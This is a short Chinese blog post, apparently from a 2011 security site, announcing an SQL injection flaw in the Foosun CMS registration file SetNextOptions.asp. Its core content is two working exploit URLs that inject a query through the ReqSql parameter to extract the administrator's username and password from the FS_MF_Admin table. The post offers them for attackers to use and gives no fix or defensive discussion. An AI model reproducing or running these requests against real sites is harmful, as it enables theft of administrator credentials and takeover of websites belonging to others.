现在的位置: 首页漏洞利用>正文
foosun最新SQL注入漏洞爆管理员帐号密码
发表于350 天前 漏洞利用 暂无评论

foosun最新SQL注入漏洞爆管理员帐号密码

风讯foosun的注册文件存在漏洞。黑客们可以暴管理员帐号和密码。
漏洞文件:http://www.xxxx.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:

http://www.xxxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_name345678++from+FS_MF_Admin

暴管理员密码:

http://www.xxxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_pass_word345678++from+FS_MF_Admin

固定链接: foosun最新SQL注入漏洞爆管理员帐号密码 | 网络安全手册 +复制链接

作者:

该日志由 lee 于2011年06月04日发表在漏洞利用分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: foosun最新SQL注入漏洞爆管理员帐号密码 | 网络安全手册
【上篇】
【下篇】

给我留言


/ 快捷键:Ctrl+Enter


返回首页

Copyright © 2011-2012 网络安全手册  保留所有权利.     基于 WordPress 技术创建   52次查询   谷歌地图 百度地图
不想听你唠叨×